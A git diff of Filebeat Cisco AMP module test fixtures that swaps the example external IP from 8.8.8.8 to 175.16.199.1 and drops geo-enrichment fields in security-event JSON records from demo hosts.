@@ -659,13 +631,6 @@ "e1:e5:94:ea:a5:44" ], "cisco.amp.timestamp_nanoseconds": 900000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.4.4", "destination.port": 443, "event.action": "DFC Threat Detected", @@ -678,7 +643,7 @@ "host.hostname": "Demo_Upatre", "host.name": "Demo_Upatre", "input.type": "log", - "log.offset": 22893, + "log.offset": 22933, "network.direction": "egress", "network.transport": "TCP", "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", @@ -692,8 +657,8 @@ "related.ip": [ "10.10.0.0", "10.10.10.10", - "8.8.4.4", - "8.8.8.8" + "175.16.199.1", + "8.8.4.4" ], "related.user": [ "user@testdomain.com" @@ -711,7 +676,7 @@ "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -731,13 +696,6 @@ "e1:e5:94:ea:a5:44" ], "cisco.amp.timestamp_nanoseconds": 869000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "8.8.4.4", "destination.port": 443, "event.action": "DFC Threat Detected", 
@@ -750,7 +708,7 @@ "host.hostname": "Demo_Upatre", "host.name": "Demo_Upatre", "input.type": "log", - "log.offset": 24346, + "log.offset": 24391, "network.direction": "egress", "network.transport": "TCP", "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", @@ -764,8 +722,8 @@ "related.ip": [ "10.10.0.0", "10.10.10.10", - "8.8.4.4", - "8.8.8.8" + "175.16.199.1", + "8.8.4.4" ], "related.user": [ "user@testdomain.com" @@ -785,7 +743,7 @@ "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -820,7 +778,7 @@ "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 25799, + "log.offset": 25849, "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" @@ -830,7 +788,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -842,7 +800,7 @@ "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -882,7 +840,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 27431, + "log.offset": 27486, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", 
@@ -893,7 +851,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -909,7 +867,7 @@ "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -943,7 +901,7 @@ "host.hostname": "Demo_TeslaCrypt", "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 28756, + "log.offset": 28816, "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" @@ -953,7 +911,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -965,7 +923,7 @@ "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1005,7 +963,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 30055, + "log.offset": 30120, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1016,7 +974,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1032,7 +990,7 @@ "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1070,7 +1028,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 31381, + "log.offset": 31451, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1081,7 +1039,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1097,7 +1055,7 @@ "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1135,7 +1093,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 32700, + "log.offset": 32775, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1146,7 +1104,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1162,7 +1120,7 @@ "@timestamp": "2021-01-15T10:22:29.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1199,7 +1157,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 34019, + "log.offset": 34099, "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" @@ -1209,7 +1167,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1221,7 +1179,7 @@ "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1261,7 +1219,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 35375, + "log.offset": 35460, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1272,7 +1230,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1288,7 +1246,7 @@ "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1326,7 +1284,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 36701, + "log.offset": 36791, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1337,7 +1295,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1353,7 +1311,7 @@ "@timestamp": "2021-01-15T10:22:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1391,7 +1349,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 38020, + "log.offset": 38115, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1402,7 +1360,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1418,7 +1376,7 @@ "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1458,7 +1416,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 39339, + "log.offset": 39439, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1469,7 +1427,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1485,7 +1443,7 @@ "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1525,7 +1483,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 40665, + "log.offset": 40770, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1536,7 +1494,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -1552,7 +1510,7 @@ "@timestamp": "2021-01-15T10:21:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1590,7 +1548,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 41991, + "log.offset": 42101, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1601,7 +1559,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1617,7 +1575,7 @@ "@timestamp": "2021-01-15T10:20:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1655,7 +1613,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 43310, + "log.offset": 43425, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1666,7 +1624,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1682,7 +1640,7 @@ "@timestamp": "2021-01-15T10:20:00.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1728,7 +1686,7 @@ "host.hostname": "Demo_AMP_Exploit_Prevention", "host.name": "Demo_AMP_Exploit_Prevention", "input.type": "log", - "log.offset": 44629, + "log.offset": 44749, "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", "related.hash": [ "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" @@ -1738,7 +1696,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1750,7 +1708,7 @@ "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1790,7 +1748,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 46087, + "log.offset": 46212, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1801,7 +1759,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1817,7 +1775,7 @@ "@timestamp": "2021-01-15T10:19:59.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1855,7 +1813,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 47413, + "log.offset": 47543, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1866,7 +1824,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -1882,7 +1840,7 @@ "@timestamp": "2021-01-15T10:19:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1920,7 +1878,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 48732, + "log.offset": 48867, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1931,7 +1889,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1947,7 +1905,7 @@ "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1987,7 +1945,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 50051, + "log.offset": 50191, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -1998,7 +1956,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2014,7 +1972,7 @@ "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2052,7 +2010,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 51377, + "log.offset": 51522, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -2063,7 +2021,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2079,7 +2037,7 @@ "@timestamp": "2021-01-15T10:18:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2117,7 +2075,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 52696, + "log.offset": 52846, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -2128,7 +2086,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2144,7 +2102,7 @@ "@timestamp": "2021-01-15T10:18:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2182,7 +2140,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 54015, + "log.offset": 54170, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -2193,7 +2151,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -2205,7 +2163,7 @@ "@timestamp": "2021-01-15T10:18:13.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2243,7 +2201,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 55334, + "log.offset": 55494, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -2254,7 +2212,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2266,7 +2224,7 @@ "@timestamp": "2021-01-15T10:18:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2304,7 +2262,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 56653, + "log.offset": 56818, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -2315,7 +2273,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2327,7 +2285,7 @@ "@timestamp": "2021-01-15T10:17:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2368,7 +2326,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 57972, + "log.offset": 58142, "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", @@ -2384,7 +2342,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2400,7 +2358,7 @@ "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2440,7 +2398,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 59570, + "log.offset": 59745, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -2451,7 +2409,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2467,7 +2425,7 @@ "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2505,7 +2463,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 60896, + "log.offset": 61076, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -2516,7 +2474,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -2532,7 +2490,7 @@ "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2570,7 +2528,7 @@ "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", "input.type": "log", - "log.offset": 62215, + "log.offset": 62400, "related.hash": [ "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", @@ -2581,7 +2539,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2597,7 +2555,7 @@ "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2635,7 +2593,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 63534, + "log.offset": 63724, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -2646,7 +2604,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2658,7 +2616,7 @@ "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2692,7 +2650,7 @@
 "host.hostname": "Demo_TeslaCrypt",
 "host.name": "Demo_TeslaCrypt",
 "input.type": "log",
- "log.offset": 64851,
+ "log.offset": 65046,
 "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
 "related.hash": [
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"
@@ -2702,7 +2660,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2714,7 +2672,7 @@
 "@timestamp": "2021-01-15T10:17:39.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2752,7 +2710,7 @@
 "host.hostname": "Demo_TeslaCrypt",
 "host.name": "Demo_TeslaCrypt",
 "input.type": "log",
- "log.offset": 66143,
+ "log.offset": 66343,
 "related.hash": [
 "209a288c68207d57e0ce6e60ebf60729",
 "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -2763,7 +2721,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
index 4a0581fcd4d6..5552e4f10765 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log
@@ -1,45 +1,45 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} 